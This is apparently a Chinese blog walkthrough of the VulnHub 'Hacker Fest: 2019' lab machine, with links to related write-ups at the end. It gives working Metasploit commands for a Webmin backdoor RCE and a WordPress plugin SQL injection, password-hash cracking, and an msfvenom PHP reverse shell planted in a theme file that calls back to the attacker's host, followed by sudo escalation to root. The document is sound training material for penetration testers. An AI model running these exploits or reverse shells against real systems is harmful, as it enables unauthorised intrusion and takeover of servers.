靶机地址
难度:初级+1
靶机描述:

The machine was part of my workshop for Hacker Fest 2019 at Prague.
Difficulty level of this VM is very “very easy”. There are two paths for exploit it.
There are no intentional rabbit holes.
Through a vulnerable “[retracted]”. Exploit is part of MSF.
Through vulnerable “[retracted]”.
Can be found by “[retracted]”.
There is a “[retracted]” injection (exploit is part of MSF).
Recovered credentials (username + hash) can be cracked by John and rockyou.txt wordlist.
Low priv shell can be gained through MSF exploit or trying the credentials against “[retracted]”.
Priv. esc. is simply done by “[retracted]”.

博客中如有任何问题,恳请批评指正,万分感谢。个人邮箱:want2live233@gmail.com

工具、知识点和漏洞

netdiscover
nmap
wpscan
john
metaspaloit
msfvenom
webmin_backdoor漏洞
wp_google_maps_sqli漏洞

0x00、信息收集

靶机IP:192.168.0.110

netdiscover -r 192.168.0.0/24


端口和服务

nmap -sS -sV -T4 -A -p- 192.168.0.110

页面、目录枚举

dirb http://192.168.0.110 -X .php,.txt,.zip,.html


匿名登录访问ftp,发现一堆wordpress的源代码,这个靶机应该是不可能进行代码审计的,这个ftp的匿名用户访问应该是个烟雾弹。前面nmap扫描的时候发现有webmin,版本是1.890

0x01、第一种方式:Webmin

根据靶机描述里面的提示,使用MSF(metasploit framework)搜索Webmin

msfconsole
search webmin

Rank为excellent的exploit有以下四个:

  • exploit/linux/http/webmin_packageup_rce
  • exploit/unix/webapp/webmin_backdoor
  • exploit/unix/webapp/webmin_show_cgi_exec
  • exploit/unix/webapp/webmin_upload_exec

webmin_packageup_rce的设置参数必须提供Webmin的账户密码,排除使用该exp。
webmin_backdoor的设置参数对于这个靶机而言我们只需要设置靶机IP和攻击机IP,于是选择使用它。结果第一次失败了,原因是该靶机的Webmin使用了SSL,而exploit中对应的默认参数是没有启用SSL/TSL的,需要我们重新设置。

nmap扫描的结果中已经提示该靶机的Webmin启用了SSL

msfconsole
use exploit/unix/webapp/webmin_backdoor
show options
set rhosts 192.168.0.110
set lhost 192.168.0.108
set ssl true
exploit # 或者run

0x02、第二种方式:WordPress

使用wpscan扫描网站

扫描的时候提示我没有WPVulnDB API Token,一时之间有点懵,wpscan用了也不是一次两次了,之前从来没有出现过这种提示。根据提示到https://wpvulndb.com/users/sign_up注册一个账号。

注册账号的过程中需要进行人机验证,所以你懂的……请备好Tizi

得到WPVulnDB API Token后就可以愉快的使用wpscan了,使用方式只是多了一个参数--api-token的设置

wpscan --url http://192.168.0.110 -e vp,vt,u --api-token APIKEY

需要把上面的APIKEY换成你自己api key

使用MSF搜索漏洞利用方式,找到auxiliary/admin/http/wp_google_maps_sqli

msfconsole
search wp_google_maps
use auxiliary/admin/http/wp_google_maps_sqli
show options
set rhosts 192.168.0.110
run

使用john爆破$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1,字典使用rockyou.txt

关于破解工具和字典的选择,靶机描述里已经给过提示了。rockyou.txtkali自带的密码字典,如果是初次使用,则需要先到/usr/share/wordlist目录将rockyou.txt.gz解压

如果你也用echo将hash值保存到文件中,需要注意的是别用双引号。因为echo会将$开头的字符串当作变量去执行,而变量又没有赋值,那么写入到文件后就没有内容了。

getshell方式一:theme页面反弹shell代码

使用webmaster/kittykat1登录管理后台

进入后台之后有点懵圈,因为语言是捷克语,突然找不到theme在哪了……然而机智的我发现了下面的套路

在404.php页面中写入反弹shell的代码

第一步,使用ifconfig命令查看kali的IP:192.168.0.110

第二步,msfvenom生成webshell代码,并保存到主题中的php文件中

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=1234 R

!!!注意:使用时需要去掉最开头的两个字符/*,不然浏览器访问反弹shell的php网页会看到/*,并且无法反弹shell. 如下图所示:


第四步,做好msfconsole接收shell的准备

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 1234
run

第五步,访问含有反弹shell代码的php页面http://192.168.0.110/wp-content/themes/twentyseventeen/404.php

某个theme下的php页面的url组成一般为http://ip地址/wp-content/主题名称全小写字母/php页面。例如,我这里的theme名称为Twenty Seventeen,对应到url上就是twentyseventeen

下面我先给出第二种getshell的方式,之后再给出提权的过程。

getshell方式二:使用MSF

msfconsole
grep shell search wordpress
use exploit/unix/webapp/wp_admin_shell_upload
show options
set password kittykat1
set username webmaster
set rhosts 192.168.0.110
run

0x03、提权

之前我们获得了WordPress后台的webmaster账户密码,所以尝试使用这个账户密码登录一下SSH,没准系统里面就有这么个用户呢?

cat /etc/passwd | grep webmaster

执行上述命令后,发现确实存在系统用户webmaster

尝试SSH登录

如果你遇到下面的问题,只需要根据红框中的提示把对应的key删除即可,我是直接把文件中的所有内容清空了。

查看当前用户能够执行的sudo权限的命令,发现是ALL,立马使用sudo su root,切换到root账户

sudo命令可以执行一次root权限的命令,但有两个条件:一是需要知道当前用户的密码;二是/etc/sudoers文件中允许了当前用户使用sudo命令。


或者,使用sudo bash

0x04、后记

在查找SUID权限命令的过程中发现了/usr/sbin/exim4,查了一下版本是4.89

关于exim4,在4.87-4.91版本有一个本地提权漏洞,MSF中相应的exploit,然后尝试利用了一下,结果没能成功,可能的原因是靶机没有开启25端口。

如果您有其他的方法,欢迎留言。若文中有任何错误,恳请批评指正。如果您觉得这篇博客写的还不错,也欢迎分享给身边的人。

『VulnHub系列』Hacker Fest: 2019-Walkthrough相关推荐

  1. 『VulnHub系列』DC: 9-Walkthrough

    靶机地址 难度:中等 靶机发布日期:2019年12月29日 靶机描述:DC-9 is another purposely built vulnerable lab with the intent of ...

  2. 『VulnHub系列』serial: 2-Walkthrough

    靶机地址 难度:中等++ 靶机发布日期:2019年9月27日 靶机描述:This box has an intermediate difficulty for the user, I suggest ...

  3. 『VulnHub系列』EnuBox_Mattermost-Walkthrough

    靶机地址 难度:初级++ 靶机发布日期:2020年1月6日 靶机描述:Description: The Mattermost chatting system may or may not hold s ...

  4. vulnhub Hacker Fest 2019 记录

    Hacker Fest 2019 Description Back to the Top The machine was part of my workshop for Hacker Fest 201 ...

  5. oscp——Hacker Fest: 2019

    0x00 前言 这个是第十四台机子,真的,这个是我做过的最简单的机子了,没有之一,适合练手~ 最后 ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?.... !. ...

  6. Hacker Fest: 2019-Walkthrough【VulnHub靶场】渗透测试实战系列3

    靶场地址:Hacker Fest: 2019 这个靶场在CTF中的等级是easy,作者也提供了一些线索,所以比较适合小伙伴们独立完成. 这个题目是两阶段flag标志获取,普通用户和root分别有fla ...

  7. 『论文复现系列』3.Glove

    ★★★ 本文源自AlStudio社区精品项目,[点击此处]查看更多精品内容 >>> 『论文复现系列』3.Glove Glove 论文 | Global Vectors for Wor ...

  8. 『Kali nethunter系列』手机发起“badUSB”攻击(Rucky,Rucky脚本)

    一个数据线,一个手机,动动手指拿下电脑控制权. 『Kali nethunter系列』手机发起"badUSB"攻击(Rucky,Rucky脚本) 当然不是只有nethunter的设备 ...

  9. 系列 | 漫谈数仓第四篇NO.4 『数据应用』(BIOLAP)

    点击上方蓝色字体,置顶/星标哦 目前10000+人已关注加入我们 本文目录CONTENTS ☞ 01.可视化BI工具 [ 开源BI,商业BI,传统BI ] ☞ 02.OLAP科普 [ ROLAP  M ...

最新文章

  1. 基于感知损失的实时风格迁移与超分辨率重建
  2. 雷军这个程序员!真的牛逼!
  3. FFT IP核调用与仿真之SCALE压缩因子设置
  4. play2框架 jpa mysql_单元测试 – Playframework 2.2.x Java JPA – 用于单元测试和生产的独立数据库...
  5. java集合体检套餐管理系统_体检套餐管理系统
  6. Asp.Net生命周期的详解
  7. linux 取消混杂模式,Linux下网卡混杂模式设置和取消
  8. jquery.dataTables.min.js:62 Uncaught TypeError: Cannot read property ‘style‘ of undefined原因
  9. c语言递归汉诺塔次数,汉诺塔问题(C语言经典递归问题(一))
  10. struts2中配置文件的调用顺序
  11. 用这10个小技巧加速Python编程
  12. 云南计算机一级c类基础知识,云南省大学计算机 一级C类 【多选题及答案】
  13. python编译:setup.py添加.h头文件或者库的搜索路径
  14. mysql event同步数据库_mysql 数据库Event定时任务使用详解(Navicat 及直接SQL语句创建)...
  15. oracle装一半报错要卸掉,OpenSUSE下oracle11gR2的安装卸载
  16. 如何理解Linux shell中的“21”?
  17. 威联通 Qnap PK 群晖 Synology 安全篇3
  18. java jdom_Java JDOM解析器
  19. 三菱 PLC通讯 MX-Component5.0 官方demo
  20. 各主板黑苹果dsdt补丁_苹果系统发展简史

热门文章

  1. 2020年全国软件业务收入将破8万亿元
  2. 接吻的十大忌讳及对策
  3. 云服务器部署项目环境搭建
  4. 洒脱喜详解Layer 2:以太坊L2将是多rollup并存的局面,跨链领域值得探索
  5. Android漂浮碰壁动画
  6. 1.8正版生存服务器,我的世界1.8纯净版
  7. 算法基础复盘笔记Day12【贪心算法】—— 区间问题、Huffman树、排序不等式、绝对值不等式、推公式
  8. 产品读书《麦肯锡工作法:个人竞争力提升50%的7堂课》
  9. hgame2023 week2 writeup
  10. Thread--线程创建的三种方式